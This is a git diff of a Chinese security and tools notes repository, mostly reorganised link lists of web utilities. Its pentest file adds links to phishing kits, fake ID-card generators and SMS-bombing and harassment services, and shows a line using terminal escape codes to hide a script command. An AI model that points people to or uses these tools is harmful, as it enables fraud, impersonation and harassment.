-`ffmpeg.exe -i "E:\Temp\002.mp4" -r 10 -b:a 32k "E:\Temp\002_mod.mp4"` 常规用法
+常规用法 : `ffmpeg.exe -i "E:\Temp\002.mp4" -r 10 -b:a 32k "E:\Temp\002_mod.mp4"`
-`ffmpeg -y -i /mnt/sdcard/demo1.mp4 -strict -2 -vcodec libx264 -preset ultrafast -crf 24 -acodec aac -ar 44100 -ac 2 -b:a 96k -s 360x640 -aspect 16:9 /mnt/sdcard/democompress.mp4` 优秀用法
+优秀用法 : `ffmpeg -y -i /mnt/sdcard/demo1.mp4 -strict -2 -vcodec libx264 -preset ultrafast -crf 24 -acodec aac -ar 44100 -ac 2 -b:a 96k -s 360x640 -aspect 16:9 /mnt/sdcard/democompress.mp4`
`ffmpeg -y -i in.mp4 -s 176x144 -vcodec libx264 -vpre fast -b 800000 out.mp4`
```
diff --git a/1earn/Plan/Team-Plan.md b/1earn/Plan/Team-Plan.md
index e6efce2a..959acfa5 100644
--- a/1earn/Plan/Team-Plan.md
+++ b/1earn/Plan/Team-Plan.md
@@ -1,7 +1,7 @@
# Team-Plan
-
+
---
@@ -98,6 +98,7 @@
- [mkdocs](https://www.mkdocs.org/)
- [wiki.js](https://wiki.js.org/)
- [star7th/showdoc](https://github.com/star7th/showdoc)
+- [Confluence](https://www.atlassian.com/software/confluence) - `推荐`
---
diff --git a/1earn/Plan/VM-Plan.md b/1earn/Plan/VM-Plan.md
index 80399405..473c268f 100644
--- a/1earn/Plan/VM-Plan.md
+++ b/1earn/Plan/VM-Plan.md
@@ -1,7 +1,7 @@
# VM-Plan
-
+
---
@@ -56,12 +56,16 @@ yum install open-vm-tools-devel -y
**常见报错**
- **该虚拟机似乎正在使用中.如果该虚拟机未在使用,请按"获取所有权(T)**
- 将虚拟机路径下后缀为 .lck 的文件夹删除
+ 将虚拟机路径下后缀为 .lck 的文件夹删除
- **无法将 Ethernet0 连接到虚拟网络"VMnet0"**
- 在 vmware"编辑->虚拟网络设置"里面,点"恢复默认"可解决.
+ 在 vmware"编辑->虚拟网络设置"里面,点"恢复默认"可解决.
- **无法获得 VMCI 驱动程序的版本: 句柄无效.驱动程序"vmci.sys"的版本不正确.....**
- 找到虚拟机路径下对应的 .vmx 文件,用编辑器打开,找到 `vmci0.present = "TRUE"`一项,将该项修改为:`vmci0.present = "FALSE"`
+ 找到虚拟机路径下对应的 .vmx 文件,用编辑器打开,找到 `vmci0.present = "TRUE"`一项,将该项修改为:`vmci0.present = "FALSE"`
+
+- **安装vmware-tools出现”what is the location of the “ifconfig”program on your machine?”**
+
+ 出现此问题的错误是因为网络问题,连通网络,安装 ifconfig 即可
\ No newline at end of file
diff --git a/1earn/Plan/Web-Tools.md b/1earn/Plan/Web-Tools.md
index 21b92104..d0f052f7 100644
--- a/1earn/Plan/Web-Tools.md
+++ b/1earn/Plan/Web-Tools.md
@@ -1,77 +1,124 @@
# Web-Tools
-
+
- `所有网页不保证其可用性、安全性,未收任何广告费用,请大胆食用😜`
-- `由于内容太多,不定期更新`
+- `由于内容太多,暂定半年更新一次`
---
## 大纲
-**工具箱**
-
-* [工具箱](#工具箱)
-
-**开发**
-
-* [开发沙盒环境](#开发沙盒环境)
-* [pcb](#pcb)
-* [网站](#网站)
- * [测速-性能检测](#测速-性能检测)
- * [ping工具](#ping工具)
- * [指纹](#指纹)
- * [旁站](#旁站)
- * [子域](#子域)
- * [DNS记录](#DNS记录)
- * [whois查询](#whois查询)
- * [备案查询](#备案查询)
-* [Crypto](#Crypto)
- * [功能类](#功能类)
- * [编码](#编码)
- * [现代密码](#现代密码)
- * [古典密码](#古典密码)
- * [其他编码](#其他编码)
-* [转换/优化](#转换/优化)
- * [代码格式化](#代码格式化)
+* **工具箱**
+
+ * [工具箱](#工具箱)
+
+* **开发**
+
+ * [开发沙盒环境](#开发沙盒环境)
+ * [pcb](#pcb)
+ * [网站](#网站)
+ * [测速-性能检测](#测速-性能检测)
+ * [ping工具](#ping工具)
+ * [指纹](#指纹)
+ * [旁站](#旁站)
+ * [子域](#子域)
+ * [DNS记录](#dns记录)
+ * [whois查询](#whois查询)
+ * [备案查询](#备案查询)
+ * [Crypto](#crypto)
+ * [功能类](#功能类)
+ * [常见编码](#常见编码)
+ * [ASCII转换](#ascii转换)
+ * [Base](#base)
+ * [HTML编码](#html编码)
+ * [Quoted-Printable](#quoted-printable)
+ * [Unicode编码](#unicode编码)
+ * [url编码](#url编码)
+ * [utf](#utf)
+ * [uuencode编码](#uuencode编码)
+ * [XXencode编码](#xxencode编码)
+ * [进制](#进制)
+ * [图片码](#图片码)
+ * [二维码](#二维码)
+ * [汉信码](#汉信码)
+ * [现代密码](#现代密码)
+ * [AES](#aes)
+ * [MD160](#md160)
+ * [md5](#md5)
+ * [rc4](#rc4)
+ * [RIPE_MD160](#ripe_md160)
+ * [SHA](#sha)
+ * [古典密码](#古典密码)
+ * [换位加密](#换位加密)
+ * [栅栏密码](#栅栏密码)
+ * [替换加密](#替换加密)
+ * [ADFGX](#adfgx)
+ * [ROT](#rot)
+ * [查尔斯加密](#查尔斯加密)
+ * [凯撒密码](#凯撒密码)
+ * [摩斯电码](#摩斯电码)
+ * [培根密码](#培根密码)
+ * [维吉尼亚密码](#维吉尼亚密码)
+ * [猪圈密码](#猪圈密码)
+ * [其他编码](#其他编码)
+ * [Brainfuck](#brainfuck)
+ * [JSfuck](#jsfuck)
+ * [JS加密/解密](#js加密解密)
+ * [颜文字加密](#颜文字加密)
+ * [与佛论禅](#与佛论禅)
+ * [文本加密为汉字](#文本加密为汉字)
+ * [随机密码生成](#随机密码生成)
+ * [核心价值观加密](#核心价值观加密)
+
+* **设计**
+
+ * [智能填充](#智能填充)
+ * [抠图](#抠图)
+ * [二维码](#二维码)
+ * [脑图-流程图-各种图](#脑图-流程图-各种图)
+ * [表情包](#表情包)
+ * [emoji](#emoji)
+ * [海报-ps](#海报-ps)
+ * [美图-功能](#美图-功能)
+ * [数据图](#数据图)
+ * [带壳截图](#带壳截图)
+ * [AI](#ai)
+ * [视频制作](#视频制作)
+ * [ICON设计](#icon设计)
* [图片压缩](#图片压缩)
* [图片放大](#图片放大)
- * [文件格式转换](#文件格式转换)
- * [tts](#tts)
-
-**设计**
-* [智能填充](#智能填充)
-* [抠图](#抠图)
-* [二维码](#二维码)
-* [脑图-流程图-各种图](#脑图-流程图-各种图)
-* [表情包](#表情包)
-* [emoji](#emoji)
-* [海报-ps](#海报-ps)
-* [美图-功能](#美图-功能)
-* [数据图](#数据图)
-* [带壳截图](#带壳截图)
-* [AI](#AI)
-
-**Misc**
-* [分享](#分享)
- * [图床](#图床)
- * [文件](#文件)
- * [文档](#文档)
- * [短链](#短链)
-* [测试](#测试)
- * [net](#net)
- * [web](#web)
- * [硬件](#硬件)
-* [娱乐](#娱乐)
-* [化学](#化学)
-* [排行榜](#排行榜)
- * [cpu](#cpu)
- * [显卡](#显卡)
- * [网站排行](#网站排行)
-* [随机](#随机)
-* [身份生成](#身份生成)
+ * [map](#map)
+ * [产品原型](#产品原型)
+ * [动效](#动效)
+
+* **Misc**
+ * [文件转换/优化](#文件转换优化)
+ * [代码格式化](#代码格式化)
+ * [文件格式转换](#文件格式转换)
+ * [ocr](#ocr)
+ * [tts](#tts)
+ * [pdf操作](#pdf操作)
+ * [分享](#分享)
+ * [图床](#图床)
+ * [文件](#文件)
+ * [文档](#文档)
+ * [短链](#短链)
+ * [各种测试](#各种测试)
+ * [net](#net)
+ * [web](#web)
+ * [硬件](#硬件)
+ * [娱乐](#娱乐)
+ * [化学](#化学)
+ * [排行榜](#排行榜)
+ * [cpu](#cpu)
+ * [显卡](#显卡)
+ * [网站排行](#网站排行)
+ * [Misc](#misc)
+ * [随机](#随机)
+ * [身份生成](#身份生成)
---
@@ -121,30 +168,35 @@
### ping工具
-- https://www.cdnplanet.com/tools/cdnfinder/
-- https://myssl.com/cdn_check.html
-- http://ping.chinaz.com/
-- https://ping.aizhan.com/
-- http://itools.com/tool/just-ping
+- [CDN Finder tool - CDN Planet](https://www.cdnplanet.com/tools/cdnfinder/)
+- [CDN检测](https://myssl.com/cdn_check.html)
+- [多个地点Ping服务器,网站测速 - 站长工具](http://ping.chinaz.com/)
+- [网站测速工具_超级ping _多地点ping检测 - 爱站网](https://ping.aizhan.com/)
+- [just-ping › Ping an internet host from 50 locations worldwide - iTools](http://itools.com/tool/just-ping)
+- [DNSMap](https://dnsmap.io/) - 检查来自世界各地的多个DNS名称服务器和解析器的域名或主机名的当前IP
### 指纹
-- http://www.yunsee.cn/
-- https://toolbar.netcraft.com/site_report?url=/
-- http://www.siteinfotool.com/
-- http://whatweb.bugscaner.com/look/
-- http://finger.tidesec.net/
+- [云悉 WEB 资产梳理|在线 CMS 指纹识别平台 - 云悉安全](http://www.yunsee.cn/)
+- [Sucuri SiteCheck - Free Website Security Check & Malware Scanner](https://sitecheck.sucuri.net/)
+- [Bad site specified](https://toolbar.netcraft.com/site_report?url=/)
+- [Site Info Tool - Website Information Lookup Tool](http://www.siteinfotool.com/)
+- [在线指纹识别,在线 cms 识别小插件--BugScaner](http://whatweb.bugscaner.com/look/)
+- [YFCMF 内容管理框架 YFCMF 内容管理框架](http://finger.tidesec.net/)
+- [BuiltWith Technology Lookup](https://searchcode.com/) - 找出网站使用什么搭建的
### 旁站
+- https://x.threatbook.cn/nodev4/vb4/list
- https://dns.aizhan.com/
-- http://www.sameip.org/
- https://www.robtex.com/
- http://www.webscan.cc/
- http://www.114best.com/ip/
- http://www.5kik.com/c/
- https://phpinfo.me/bing.php
- https://dnsdumpster.com/
+- https://viewdns.info/iphistory/
+- https://securitytrails.com/
### 子域
@@ -191,6 +243,14 @@
## Crypto
+**在线工具**
+- http://tool.bugku.com/
+- http://ctf.ssleye.com/
+- https://ctftools.com/down/
+- https://gchq.github.io/CyberChef/
+- https://www.sojson.com/encrypt/
+- https://cryptii.com/
+
### 功能类
**数学**
@@ -211,58 +271,73 @@
**时间戳**
- http://tool.chinaz.com/tools/unixtime.aspx
-### 编码
+---
+
+### 常见编码
+
+#### ASCII转换
-**ASCII转换**
- http://www.ab126.com/goju/1711.html
-**base**
-- 32
- - http://tomeko.net/online_tools/base32.php
+#### Base
+
+**32**
+- http://tomeko.net/online_tools/base32.php
+
+**64**
+- http://base64.xpcha.com/
+- http://tool.chinaz.com/Tools/Base64.aspx
+- https://base64.supfree.net/
+- http://www1.tc711.com/tool/BASE64.htm
+- http://decodebase64.com/
+- http://web.chacuo.net/charsetbase64
+- https://www.base64decode.org/
-- 64
- - http://base64.xpcha.com/
- - http://tool.chinaz.com/Tools/Base64.aspx
- - https://base64.supfree.net/
- - http://www1.tc711.com/tool/BASE64.htm
- - http://decodebase64.com/
- - http://web.chacuo.net/charsetbase64
- - https://www.base64decode.org/
+**base16**
+- https://www.qqxiuzi.cn/bianma/base.php?type=16
-- base16
- - https://www.qqxiuzi.cn/bianma/base.php?type=16
+**base92**
+- http://ctf.ssleye.com/base92.html
+
+#### HTML编码
-**HTML编码**
- https://www.qqxiuzi.cn/bianma/zifushiti.php
- http://www.convertstring.com/zh_CN/EncodeDecode/HtmlEncode
- https://tool.oschina.net/encode
-**Quoted-Printable**
+#### Quoted-Printable
+
- http://web.chacuo.net/charsetquotedprintable
- http://www.mxcz.net/tools/QuotedPrintable.aspx
-**Unicode编码**
+#### Unicode编码
+
- http://tool.chinaz.com/tools/unicode.aspx
- http://www.mxcz.net/tools/Unicode.aspx
-**url编码**
+#### url编码
+
- http://web.chacuo.net/charseturlencode
- https://meyerweb.com/eric/tools/dencoder/
- http://tool.oschina.net/encode?type=4
- http://www.mxcz.net/tools/Url.aspx
-**utf**
+#### utf
+
- http://tool.chinaz.com/Tools/UTF-8.aspx
- http://tool.oschina.net/encode?type=2
-**uuencode编码**
+#### uuencode编码
+
- http://web.chacuo.net/charsetuuencode
- http://www.mxcz.net/tools/UUEncode.aspx
-**XXencode编码**
+#### XXencode编码
+
- http://web.chacuo.net/charsetxxencode
-**进制**
+#### 进制
+
- https://js.tuisec.win/convert/ox2str/
- http://www.5ixuexiwang.com/str/from-hex.php
- http://www.convertstring.com/zh_CN/EncodeDecode/HexDecode
@@ -270,8 +345,22 @@
- http://tool.oschina.net/hexconvert/
- http://www.mxcz.net/tools/Hex.aspx
-**JS加密-解密**
-- http://tool.chinaz.com/tools/scriptencode.aspx
+
+#### 图片码
+##### 二维码
+
+**在线制作/识别二维码工具**
+- http://tool.chinaz.com/qrcode/
+- http://jiema.wwei.cn/
+- https://cli.im/
+- https://www.beaconstac.com/qr-code-generator
+
+##### 汉信码
+
+**在线识别汉信码工具**
+- http://www.efittech.com/hxdec.html
+
+---
### 现代密码
@@ -281,13 +370,16 @@
- http://tool.chacuo.net/cryptdes
- https://hashtoolkit.com/
-**AES**
-- http://aes.online-domain-tools.com/
+#### AES
+
+- [AES Encryption – Easily encrypt or decrypt strings or files](http://aes.online-domain-tools.com/)
+
+#### MD160
-**MD160**
- http://www.convertstring.com/zh_CN/Hash/RIPE_MD160
-**md5**
+#### md5
+
- https://md5.navisec.it/
- https://www.somd5.com/
- https://www.md5online.org/
@@ -308,47 +400,58 @@
- https://md5online.org/
- http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php
-**rc4**
+#### rc4
+
- https://www.sojson.com/encrypt_rc4.html
- http://tool.chacuo.net/cryptrc4
-**SHA**
-- http://www.convertstring.com/zh_CN/Hash/SHA1
-- http://www.convertstring.com/zh_CN/Hash/SHA256
-- http://www.convertstring.com/zh_CN/Hash/SHA384
-- http://www.convertstring.com/zh_CN/Hash/SHA512
+#### RIPE_MD160
+
+- http://www.convertstring.com/zh_CN/Hash/RIPE_MD160
-**SHA1 碰撞**
-- https://alf.nu/SHA1
+#### SHA
+
+- [SHA1哈希 - 在线SHA1散列发生器](http://www.convertstring.com/zh_CN/Hash/SHA1)
+- [SHA256哈希 - 在线SHA256哈希发生器](http://www.convertstring.com/zh_CN/Hash/SHA256)
+- [SHA384哈希 - 在线SHA384哈希发生器](http://www.convertstring.com/zh_CN/Hash/SHA384)
+- [SHA512哈希 - 在线SHA512哈希发生器](http://www.convertstring.com/zh_CN/Hash/SHA512)
+
+---
### 古典密码
-**ADFGX**
-- http://www.practicalcryptography.com/ciphers/adfgx-cipher/
+#### 换位加密
-**Brainfuck**
-- http://esoteric.sange.fi/brainfuck/impl/interp/i.html
-- https://www.nayuki.io/page/brainfuck-interpreter-javascript
-- https://www.splitbrain.org/services/ook
+##### 栅栏密码
-**JSfuck**
-- http://discogscounter.getfreehosting.co.uk/js-noalnum.php
-- http://www.jsfuck.com/
+- http://www.practicalcryptography.com/ciphers/classical-era/rail-fence/
+
+---
+
+#### 替换加密
+
+##### ADFGX
+
+- http://www.practicalcryptography.com/ciphers/adfgx-cipher/
+
+##### ROT
-**ROT**
- https://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php
- http://www.mxcz.net/tools/rot13.aspx
- https://www.rot13.com/
-**凯撒密码**
+##### 查尔斯加密
+
+- http://rumkin.com/tools/cipher/playfair.php
+
+##### 凯撒密码
+
- https://www.xarg.org/tools/caesar-cipher/
- https://planetcalc.com/1434/
- http://www.zjslove.com/3.decode/kaisa/index.html
-**培根密码**
-- http://rumkin.com/tools/cipher/baconian.php
+##### 摩斯电码
-**摩斯电码**
- http://rumkin.com/tools/cipher/morse.php
- https://morsecode.scphillips.com/translator.html
- https://morsify.net/
@@ -357,123 +460,57 @@
- http://zhongguosou.com/zonghe/moErSiCodeConverter.aspx
- https://www.jb51.net/tools/morse.htm
-**查尔斯加密**
-- http://rumkin.com/tools/cipher/playfair.php
+##### 培根密码
-**栅栏密码**
-- http://www.practicalcryptography.com/ciphers/classical-era/rail-fence/
+- http://rumkin.com/tools/cipher/baconian.php
-**猪圈密码**
-- http://www.simonsingh.net/The_Black_Chamber/pigpen.html
+##### 维吉尼亚密码
-**维吉尼亚密码**
- https://planetcalc.com/2468/
-**语义分析**
-- https://quipqiup.com/
+##### 猪圈密码
-**颜文字加密**
-- https://cat-in-136.github.io/2010/12/aadecode-decode-encoded-as-aaencode.html
-- http://utf-8.jp/public/aaencode.html
+- http://www.simonsingh.net/The_Black_Chamber/pigpen.html
-**搞笑加密**
-- http://www.keyfc.net/bbs/tools/tudoucode.aspx
-- http://www.qqxiuzi.cn/bianma/wenbenjiami.php
-- https://utils.chrisyue.com/password-generator/
-- https://sym233.github.io/core-values-encoder/
+---
### 其他编码
-**Brainfuck**
+#### Brainfuck
+
- http://esoteric.sange.fi/brainfuck/impl/interp/i.html
- https://www.nayuki.io/page/brainfuck-interpreter-javascript
- https://www.splitbrain.org/services/ook
-**JSfuck**
+#### JSfuck
+
- http://discogscounter.getfreehosting.co.uk/js-noalnum.php
- http://www.jsfuck.com/
-**JS加密/解密**
+#### JS加密/解密
+
- http://tool.chinaz.com/tools/scriptencode.aspx
-**颜文字加密(aadecode)**
+#### 颜文字加密
+
- https://cat-in-136.github.io/2010/12/aadecode-decode-encoded-as-aaencode.html
- http://utf-8.jp/public/aaencode.html
-**与佛论禅**
-- http://www.keyfc.net/bbs/tools/tudoucode.aspx
-
-**文本加密为汉字**
-- http://www.qqxiuzi.cn/bianma/wenbenjiami.php
-
-**随机密码生成**
-- https://utils.chrisyue.com/password-generator/
-
-**核心价值观加密**
-- https://sym233.github.io/core-values-encoder/
-
----
-
-## 转换/优化
-
-### 代码格式化
+#### 与佛论禅
-- https://codebeautify.org/
-- https://tool.lu/php
-- http://tools.jb51.net/code
-- https://tool.lu/c/developer
-- http://deobfuscatejavascript.com/
-- https://tool.lu/html/
-
-### 图片压缩
-
-- http://gifcompressor.com/
-- https://goimg.io/
-- http://www.iloveimg.com/zh_cn
-- https://imgless.com/
-- https://www.picdiet.com/
-- https://shrinkme.app/
-- https://tinypng.com/
-- http://optimizilla.com/zh/
-- http://www.secaibi.com/tools/
-- https://squoosh.app/
-- https://ezgif.com/optimize
-- https://docsmall.com/image-compress
-- https://docsmall.com/gif-compress
-- https://docsmall.com/pdf-compress
+- http://www.keyfc.net/bbs/tools/tudoucode.aspx
-### 图片放大
+#### 文本加密为汉字
-- https://www.vectorizer.io/
-- https://vectormagic.com/
-- http://waifu2x.udp.jp/
-- https://waifu2x.booru.pics/
-- https://bigjpg.com/
+- http://www.qqxiuzi.cn/bianma/wenbenjiami.php
-### 文件格式转换
+#### 随机密码生成
-- https://pandoc.org/index.html
-- https://cloudconvert.com/
-- https://convertio.co/zh/
-- https://www.hipdf.com/cn/
-- https://www.online-convert.com/
-- http://ringer.org/
-- https://smallpdf.com/
-- https://www.apowersoft.cn/heic-to-jpg
-- https://cn.office-converter.com/
-- http://www.bitbug.net/
-- https://jinaconvert.com/cn/
-- https://easypdf.com/cn
-- http://www.mdtr2pdf.com/index.html
-- https://lightpdf.com/zh/
-- https://pdf.to/
-- https://docsmall.com/pdf-merge
-- https://docsmall.com/pdf-split
+- https://utils.chrisyue.com/password-generator/
-### tts
+#### 核心价值观加密
-- https://ttsreader.com/
-- http://ocr.wdku.net/
+- https://sym233.github.io/core-values-encoder/
---
@@ -488,13 +525,8 @@
- https://www.gaoding.com/koutu
- https://www.remove.bg/
- https://burner.bonanza.com/
-
-## 二维码
-
-- http://tool.chinaz.com/qrcode/
-- http://jiema.wwei.cn/
-- https://cli.im/
-- https://www.beaconstac.com/qr-code-generator
+- https://bgeraser.com/index.html
+- https://www.stickermule.com/trace
## 脑图-流程图-各种图
@@ -505,11 +537,13 @@
- https://www.promomatic.com/
- https://www.yuque.com/ruanyf/share/free-diagram
- https://gallery.echartsjs.com/
+- http://naotu.baidu.com/home
## 表情包
- https://sorry.xuty.tk/sorry/
- http://www.gifntext.com/
+- https://www.festisite.com/money/us_dollar_1/
## emoji
@@ -518,9 +552,8 @@
- http://www.openmoji.org/
- https://phlntn.com/emojibuilder/
- https://www.webfx.com/tools/emoji-cheat-sheet/
-- https://copychar.cc/
-- https://cn.piliapp.com/symbol/
- https://unicode.org/emoji/charts/full-emoji-list.html
+- https://emojicp.com/
## 海报-ps
@@ -534,15 +567,19 @@
- https://www.autodraw.com/
- https://promo.com/tools/image-resizer/
- https://pixlr.com/x/
+- https://app.itg.digital/
+- https://replacecover.com/
+- https://www.gaoding.com/
+- https://www.chuangkit.com/
+- https://www.inspirationde.com/
-## 美图-功能
+## 美图/功能
- https://pissang.github.io/voxelize-image/
- http://www.polaxiong.com/editor
- http://www.makepic.net/Tool/Image2ascii.html
- https://www.bootschool.net/ascii
- http://www.network-science.de/ascii/
-- https://pixelmap.amcharts.com/#
- http://weavesilk.com/
- http://www.ostagram.me/
- http://asciiflow.com/
@@ -558,6 +595,9 @@
- https://www.imgbot.ai/
- https://pixfix.com/
- https://resizing.app/
+- https://picrew.me/
+- https://www.moage.cn/
+- http://yciyun.com/
## 数据图
@@ -571,6 +611,7 @@
- https://www.screely.com/
- https://browserframe.com/
- https://codeimg.io/
+- https://carbon.now.sh/
## AI
@@ -583,11 +624,121 @@
- https://nvlabs.github.io/SPADE/
- https://havetheyfaked.me/
- https://selfie2anime.com/
+- https://facemaze.io/
+- https://reflect.tech/faceswap/hot
+- https://generated.photos/faces
+
+
+## 视频制作
+
+- https://online-video-cutter.com/tw/
+- https://bilibili.clipchamp.com/
+
+## ICON设计
+
+- https://favicomatic.com/
+
+## 图片压缩
+
+- http://gifcompressor.com/
+- https://goimg.io/
+- http://www.iloveimg.com/zh_cn
+- https://imgless.com/
+- https://www.picdiet.com/
+- https://shrinkme.app/
+- https://tinypng.com/
+- http://optimizilla.com/zh/
+- http://www.secaibi.com/tools/
+- https://ezgif.com/optimize
+- https://docsmall.com/image-compress
+- https://docsmall.com/gif-compress
+- https://docsmall.com/pdf-compress
+
+## 图片放大
+
+- https://www.vectorizer.io/
+- https://vectormagic.com/
+- http://waifu2x.udp.jp/
+- https://waifu2x.booru.pics/
+- https://bigjpg.com/
+- https://www.imageenlarger.com/
+- https://imglarger.com/Home/
+- https://icons8.com/upscaler
+- https://letsenhance.io/
+
+## map
+
+- https://maplab.amap.com/
+- https://pixelmap.amcharts.com/#
+- https://web.raykite.com/#reloaded
+
+## 产品原型
+
+- https://suulnnka.github.io/BullshitGenerator/index.html
+- https://www.mockplus.cn/
+- https://uiprint.co/all-printable/
+- https://epic.ai/mockdown/
+- https://marp.app/
+
+## 动效
+
+- https://svgartista.net/
---
# Misc
+## 文件转换/优化
+
+### 代码格式化
+
+- https://codebeautify.org/
+- https://tool.lu/php
+- http://tools.jb51.net/code
+- https://tool.lu/c/developer
+- http://deobfuscatejavascript.com/
+- https://tool.lu/html/
+
+### 文件格式转换
+
+- https://pandoc.org/index.html
+- https://cloudconvert.com/
+- https://convertio.co/zh/
+- https://www.online-convert.com/
+- http://ringer.org/
+- https://www.apowersoft.cn/heic-to-jpg
+- https://cn.office-converter.com/
+- http://www.bitbug.net/
+- https://jinaconvert.com/cn/
+- https://easypdf.com/cn
+- https://pdf.to/
+- https://www.online-convert.com/
+- https://www.aconvert.com/cn/image/jpg-to-svg/
+- https://word.to/
+
+### ocr
+
+- https://online.easyscreenocr.com/ZH
+- https://web.baimiaoapp.com/
+
+### tts
+
+- https://ttsreader.com/
+- http://ocr.wdku.net/
+
+### pdf操作
+
+- http://www.mdtr2pdf.com/index.html
+- https://lightpdf.com/zh/
+- https://docsmall.com/pdf-merge
+- https://docsmall.com/pdf-split
+- https://www.hipdf.com/cn/
+- https://smallpdf.com/
+- https://www.sejda.com/
+- https://tools.pdf24.org/zh/
+
+---
+
## 分享
### 图床
@@ -604,22 +755,6 @@
- https://simimg.com/
- http://www.tietuku.com/
-### 文件
-
-- https://bitsend.jp/
-- https://file.pizza/
-- https://www.4shared.com/
-- https://drp.io/
-- https://fileroom.io/about
-- https://drop.usestak.com/
-- https://fuli.cowtransfer.com/
-- https://clicknupload.org/
-- https://drop.me/
-- http://5minutestorage.com/
-- https://send.firefox.com/
-- https://github.com/mozilla/send
-- https://wetransfer.com/
-
### 文档
- https://notepin.co/
@@ -636,6 +771,23 @@
- https://1ty.me/
- https://telegra.ph/
- https://paste.ubuntu.com/
+- https://paste2.org/
+
+### 文件
+
+- https://bitsend.jp/
+- https://file.pizza/
+- https://www.4shared.com/
+- https://drp.io/
+- https://fileroom.io/about
+- https://drop.usestak.com/
+- https://fuli.cowtransfer.com/
+- https://clicknupload.org/
+- https://drop.me/
+- http://5minutestorage.com/
+- https://send.firefox.com/
+- https://github.com/mozilla/send
+- https://wetransfer.com/
### 短链
@@ -656,10 +808,17 @@
- https://zws.im/
- https://ml.mk/
- https://lstu.fr/
+- https://www.aware-online.com/en/find-an-instagram-user-id/
+- https://www.expandurl.net/
+- https://linkexpander.com/
+- http://urlexpander.net/
+- https://urlex.org/
+- https://checkshorturl.com/
+- https://www.linkslist.app/
---
-## 测试
+## 各种测试
### net
@@ -702,6 +861,7 @@
- http://yayun.la/
- https://static.hfi.me/mikutap/
- https://aidn.jp/mikutap/
+- https://geekprank.com/fake-virus/
---
@@ -714,45 +874,36 @@
## 排行榜
-- https://www.harddrivebenchmark.net/high_end_drives.html
-- https://www.passmark.com/index.html
-- http://guozhivip.com/rank/
-- https://www.levels.fyi/
-- https://openbenchmarking.org/
-- https://db-engines.com/en/ranking
-- http://distrowatch.com/
-
### cpu
- https://www.cpubenchmark.net/high_end_cpus.html
- http://www.mydrivers.com/zhuanti/tianti/01/index.html
- http://www.mydrivers.com/zhuanti/tianti/cpu/index.html
- http://www.mydrivers.com/zhuanti/tianti/cpum/index.html
+- https://topic.expreview.com/CPU/
### 显卡
- https://www.videocardbenchmark.net/high_end_gpus.html
- http://www.mydrivers.com/zhuanti/tianti/gpu/index.html
- http://www.mydrivers.com/zhuanti/tianti/gpum/index.html
+- http://topic.expreview.com/GPU/
### 网站排行
- https://www.alexa.com/
- https://www.similarweb.com/
+### Misc
+
+- http://guozhivip.com/rank/
+- https://www.levels.fyi/
+- https://openbenchmarking.org/
+- https://db-engines.com/en/ranking
+
---
## 随机
- https://www.random.org/
- https://www.uuidgenerator.net/
-
----
-
-## 身份生成
-
-- https://www.fakenamegenerator.com/
-- https://www.fakeaddressgenerator.com/Index/index
-- http://jbjb.zouri.jp/
-- http://jsrun.net/square?page=1&s=%E8%BA%AB%E4%BB%BD%E8%AF%81%E5%8F%B7
-- https://id.ifreesite.com/
diff --git "a/1earn/\345\256\211\345\205\250/Power-PenTest.md" "b/1earn/\345\256\211\345\205\250/Power-PenTest.md"
index 68ca5a7e..edc78fc6 100644
--- "a/1earn/\345\256\211\345\205\250/Power-PenTest.md"
+++ "b/1earn/\345\256\211\345\205\250/Power-PenTest.md"
@@ -10,7 +10,7 @@
```
-
+
---
@@ -63,6 +63,7 @@
* [APT](#apt)
* [Email](#email)
* [钓鱼](#钓鱼)
+ * [office钓鱼](#office钓鱼)
* [爆破](#爆破)
* [字典](#字典)
* [web爆破](#web爆破)
@@ -503,17 +504,37 @@
- [QQ定位女友是否回家系列二之定位系统的打造](http://www.freebuf.com/news/141038.html)
- [利用斯拉夫字母辅助社会工程学攻击思路](https://bbs.ichunqiu.com/thread-46462-1-2.html)
-**工具**
+**钓鱼工具**
- [HTTrack](http://topspeedsnail.com/httrack-clone-website/) - 克隆任意网站
-- [Seeker](http://www.freebuf.com/sectool/179641.html) - 一款可获取高精度地理和设备信息的工具
- [thelinuxchoice/blackeye](https://github.com/thelinuxchoice/blackeye) - 网络钓鱼工具,有32个模板+1定制
-- [bhattsameer/Bombers](https://github.com/bhattsameer/Bombers) - SMS/email/whatsapp 爆破合集
- [SET](https://github.com/trustedsec/social-engineer-toolkit/)
- [SET 笔记](./工具/SET.md)
-**office**
-- 文章
- - [攻防演练对抗赛之初识文件钓鱼](https://www.freebuf.com/articles/network/219999.html)
+**定位**
+- [Seeker](http://www.freebuf.com/sectool/179641.html) - 一款可获取高精度地理和设备信息的工具
+
+**身份信息**
+- [Generate a Random Name](https://www.fakenamegenerator.com/) - 随机身份生成
+- [Fake Address, Random Address Generator](https://www.fakeaddressgenerator.com/Index/index) - 随机身份生成
+- [Behind the Name](https://www.behindthename.com/random/) - Random Name Generator
+- [Easy Random Name Picker](https://randomwordgenerator.com/name.php) - Random Name Generator
+- [ElfQrin](https://www.elfqrin.com/fakeid.php) - Fake Identity ID Random Name Generator
+- [Random User Generator](https://randomuser.me/)
+- [在线身份证号码生成器](http://jbjb.zouri.jp/)
+- [中国大陆内地姓名、身份证号、银行卡号生成器](http://jsrun.net/square?page=1&s=%E8%BA%AB%E4%BB%BD%E8%AF%81%E5%8F%B7)
+- [在线身份证号码生成器](https://id.ifreesite.com/)
+- [airob0t/idcardgenerator 身份证图片生成工具](https://github.com/airob0t/idcardgenerator)
+- [gh0stkey/RGPerson](https://github.com/gh0stkey/RGPerson) - 随机身份生成脚本
+- [naozibuhao/idcard](https://github.com/naozibuhao/idcard) - 身份证生成器
+- [伪造人像](thispersondoesnotexist)
+- [Just Delete Me](https://backgroundchecks.org/justdeleteme/fake-identity-generator/) - 假身份生成器(这个网站的图标,好像在哪里看过🤔)
+
+**短信骚扰**
+- 工具
+ - [bhattsameer/Bombers](https://github.com/bhattsameer/Bombers) - SMS/email/whatsapp 爆破合集
+
+- 在线工具
+ - http://www.1314.buzz/index.php - 慎用!
**rlo**
- 文章
@@ -552,6 +573,10 @@
echo -e 'write-host "evil!"\r\n#\033[A\033[2Dwrite-host "Hello World!"' > script.ps1
```
+#### office钓鱼
+- 文章
+ - [攻防演练对抗赛之初识文件钓鱼](https://www.freebuf.com/articles/network/219999.html)
+
---
## 爆破
@@ -1086,7 +1111,7 @@ DNS 协议属于 OSI 第七层,DNS 劫持指控制域名解析权限,比如
### aws
**文章**
